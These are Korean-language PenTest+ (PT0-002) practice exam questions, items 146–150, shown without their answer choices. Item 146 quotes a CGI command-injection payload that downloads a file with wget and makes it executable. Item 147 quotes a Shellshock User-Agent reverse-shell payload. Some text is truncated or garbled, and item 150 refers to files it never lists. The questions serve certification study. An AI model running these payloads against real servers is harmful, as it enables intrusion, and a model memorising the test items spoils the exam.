PT0-002 문제 146

침투 테스터가 익스플로잇을 사용하여 시스템에 액세스할 수 있었습니다. 다음은 활용된 코드의 일부입니다.
익스플로잇 = "POST"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS
&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후에 실행해야 하는 명령은 무엇입니까?

PT0-002 문제 147

침투 테스터가 10.10.1.1에서 취약한 웹 서버를 발견했습니다. 그런 다음 테스터는 웹 익스플로잇을 보내는 Python 스크립트를 편집하고 다음 코드를 발견합니다.
explores = {"User-Agent": "() { 무시됨;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application /xhtml+xml,application/xml"} 서버가 실행되는 사용자 컨텍스트를 결정하기 위해 테스터는 다음 중 스크립트에서 어떤 편집을 수행해야 합니까?

PT0-002 문제 148

당신은 서버에서 포트 스캔을 실행하는 침투 테스터입니다.
지침
1부: 출력이 주어지면 사용 가능한 옵션에서 이 출력을 생성하는 데 사용된 명령을 구성합니다.
2부: 명령이 적절하게 구성되면 제공된 출력을 사용하여 추가로 조사해야 할 잠재적인 공격 벡터를 식별합니다.
언제든지 시뮬레이션의 초기 상태를 되돌리려면 모두 재설정 버튼을 클릭하십시오.

PT0-002 문제 149

침투 테스터는 공격자가 물리적 접근 제어 시스템에 사용되는 특수 TCP 서비스를 통해 문을 열 수 있도록 하는 취약점을 찾고 있습니다. 이 서비스는 100개 이상의 다양한 호스트에 존재하므로 테스터는 평가를 자동화하려고 합니다. 식별을 위해서는 침투 테스터가 다음을 수행해야 합니다.
완전한 TCP 연결을 갖습니다.
"hello" 페이로드 보내기
응답을위한 월트
16바이트보다 긴 문자열을 보냅니다.
다음 접근 방식 중 목표를 가장 잘 뒷받침하는 것은 무엇입니까?

PT0-002 문제 150

침투 테스터가 디렉터리 탐색을 통해 경로에 업로드하는 기능을 제공하는 취약점을 발견했습니다. 이 취약점을 통해 발견된 파일 중 일부는 다음과 같습니다.

다음 중 공격자가 영향을 받는 시스템에 대한 내부 액세스 권한을 얻도록 돕는 가장 좋은 방법은 무엇입니까?